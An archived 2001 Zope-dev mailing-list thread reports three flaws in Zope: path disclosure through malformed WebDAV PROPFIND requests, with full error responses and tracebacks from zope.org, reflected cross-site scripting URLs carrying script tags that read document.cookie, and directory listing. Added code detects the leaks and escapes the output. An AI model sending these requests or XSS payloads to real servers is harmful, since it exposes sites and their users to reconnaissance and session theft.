[Zope-dev] Vulnerability in Zope

2001-09-23 Thread ALife

Found a vulnerability: it is possible to retrieve the full path to local files in Zope.

---[ Example 1 (Linux):

telnet www.zope.org 80

PROPFIND / HTTP/1.0

F
G
H
J
K
L
HTTP/1.0 500 Internal Server Error
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Mon, 10 Sep 2001 15:38:59 GMT
Content-Length: 7058
Ms-Author-Via: DAV
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/PropertySheets.py
Bobo-Exception-Type: TypeError
Content-Type: text/html
Bobo-Exception-Value: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//
EN http://www.w3.org/TR/REC-html40/loose.dtd; HTML  HEAD  TITLEWelcome
to Zope.org/TITLE   link rel=stylesheet href=http://www.zope.org/zope_css;
 type=text/css   /HEAD   BODY B
Bobo-Exception-Line: 369


...


 !--
 Traceback (innermost last):
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, in publish_module
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish
  File /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, in zpublisher_exception_hook
    (Object: ApplicationDefaultPermissions)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 171, in publish
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/mapply.py, line 160, in mapply
    (Object: PROPFIND)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 112, in call_object
    (Object: PROPFIND)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/Resource.py, line 222, in PROPFIND
    (Object: ApplicationDefaultPermissions)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 175, in apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/PropertySheets.py, line 369, in dav__allprop
    (Object: Virtual)
 TypeError: (see above)

 --
Host has closed connection.

---[ Example 2 (Linux):
telnet www.zope.com 80

 / HTTP/1.0
or NOTREALCOMMAND / HTTP/1.0


HTTP/1.0 404 Not Found
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Fri, 21 Sep 2001 12:51:48 GMT
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/HTTPResponse.py
Content-Type: text/html
Bobo-Exception-Type: NotFound
Bobo-Exception-Value: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//
EN http://www.w3.org/TR/REC-html40/loose.dtd; HTML  HEAD  TITLEWelcome
to Zope.org/TITLE   link rel=stylesheet href=http://www.zope.org/zope_css;
 type=text/css   /HEAD   BODY B
Content-Length: 5845
Bobo-Exception-Line: 547

 ... 

 !--
 Traceback (innermost last):
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, in publish_module
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish
  File /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, in zpublisher_exception_hook
    (Object: ApplicationDefaultPermissions)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 173, in publish
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/HTTPResponse.py, line 308, in setBody
  File /usr/loc
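
An added example, not part of the original post and not Zope code: a check a defender can run over a captured error response to list what it discloses (the Bobo-Exception-* headers, the versioned Server banner, the traceback comment, filesystem paths), and a filter that produces the response a front-end proxy should send instead. The function names and the sample response are assumptions made for this illustration.

```python
import re

# Constructed sample modelled on the 500 response quoted above; the "<!--"/"-->"
# markers around the traceback are an assumption about the raw page.
SAMPLE = (
    "HTTP/1.0 500 Internal Server Error\r\n"
    "Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1\r\n"
    "Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/PropertySheets.py\r\n"
    "Bobo-Exception-Type: TypeError\r\n"
    "Bobo-Exception-Line: 369\r\n"
    "Content-Type: text/html\r\n\r\n"
    "<html><body>Error</body></html>\n<!--\nTraceback (innermost last):\n"
    "  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 175, in apply\n"
    "TypeError: (see above)\n-->\n"
)
DEBUG_PREFIX = "bobo-exception-"
TRACEBACK = re.compile(r"<!--\s*Traceback \(innermost last\):.*?-->", re.S)
PY_PATH = re.compile(r"(?:/[\w.+-]+)+\.py|[A-Za-z]:\\[\w.\\+-]+\.py")

def parse(raw):
    """Split a raw response into (status line, [(name, value)], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *lines = head.split("\r\n")
    headers = [tuple(p.strip() for p in l.split(":", 1)) for l in lines if ":" in l]
    return status, headers, body

def leaks(raw):
    """Return a sorted list describing everything the response discloses."""
    _, headers, body = parse(raw)
    found = set()
    for name, value in headers:
        if name.lower().startswith(DEBUG_PREFIX):
            found.add("debug header: " + name)
        if name.lower() == "server" and re.search(r"\d+\.\d+", value):
            found.add("versioned Server banner")
        found.update("path: " + p for p in PY_PATH.findall(value))
    if TRACEBACK.search(body):
        found.add("traceback in HTML comment")
    found.update("path: " + p for p in PY_PATH.findall(body))
    return sorted(found)

def scrub(raw):
    """Rebuild the response without debug headers, version banner or traceback."""
    status, headers, body = parse(raw)
    body = TRACEBACK.sub("", body)
    kept = [(n, v.split("/", 1)[0] if n.lower() == "server" else v)
            for n, v in headers
            if not n.lower().startswith(DEBUG_PREFIX) and n.lower() != "content-length"]
    kept.append(("Content-Length", str(len(body.encode("latin-1")))))
    return "\r\n".join([status] + ["%s: %s" % h for h in kept]) + "\r\n\r\n" + body
```
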

[Zope-dev] New: Cross Site Scripting vulnerability

2001-09-23 Thread ALife


Example:

http://www.zope.org/Documentation/<SCRIPT>alert(document.domain)</SCRIPT>
http://www.zope.org/lalalalal<SCRIPT>alert(document.domain)</SCRIPT>
http://www.zope.org/<SCRIPT>alert(document.cookie)</SCRIPT>

For example, an attacker might post a message like

Hello message board. This is a message.
   <SCRIPT>malicious code</SCRIPT>
This is the end of my message.

When a victim with scripts enabled in their browser reads this
message, the malicious code may be executed unexpectedly.
Scripting tags that can be embedded in this way include SCRIPT,
OBJECT, APPLET, and EMBED.



___
Zope-Dev maillist  -  [EMAIL PROTECTED]
http://lists.zope.org/mailman/listinfo/zope-dev
**  No cross posts or HTML encoding!  **
(Related lists - 
 http://lists.zope.org/mailman/listinfo/zope-announce
 http://lists.zope.org/mailman/listinfo/zope )
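
An added example, not part of the original post and not Zope code: an error page and a message-board renderer that echo user-controlled text, each shown unescaped beside the escaped form, with a check for the four tag names the post lists. All function names and the page template are hypothetical; the test path is a constructed, percent-encoded variant of the URLs in the post.

```python
import html
import re
from urllib.parse import unquote

TEMPLATE = "<html><body><p>Resource not found: %s</p></body></html>"
# The tags the post names as embeddable: SCRIPT, OBJECT, APPLET, EMBED.
ACTIVE_TAG = re.compile(r"<\s*(script|object|applet|embed)\b", re.I)

def not_found_unsafe(path):
    """Echoes the decoded request path into the page verbatim (the reported behaviour)."""
    return TEMPLATE % unquote(path)

def not_found_safe(path):
    """Decodes first, then HTML-escapes, so the path can only ever render as text."""
    return TEMPLATE % html.escape(unquote(path), quote=True)

def render_message(text):
    """Message-board case: escape the stored text, then add the only markup allowed."""
    return html.escape(text, quote=True).replace("\n", "<br>")

def carries_active_markup(page):
    """True if a scripting tag from the post's list survives into the output."""
    return bool(ACTIVE_TAG.search(page))

if __name__ == "__main__":
    # Constructed request path, percent-encoded as a browser would send it.
    path = "/lalalalal%3CSCRIPT%3Ealert(document.domain)%3C/SCRIPT%3E"
    print(carries_active_markup(not_found_unsafe(path)))  # tag reaches the page
    print(carries_active_markup(not_found_safe(path)))    # rendered as inert text
    print(render_message("Hello message board.\n<EMBED src=x>"))
```
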



[Zope-dev] Vulnerability: attacker can get file and directory list

2001-09-23 Thread ALife

Vulnerability: an attacker can get the file and directory list.
Tested on the Win32 platform.

Example:
telnet zopeserver 8080
PROPFIND / HTTP/1.0
enter
enter
enter

[lists files and directories]

This was tested on my site:
security.instock.ru 8080

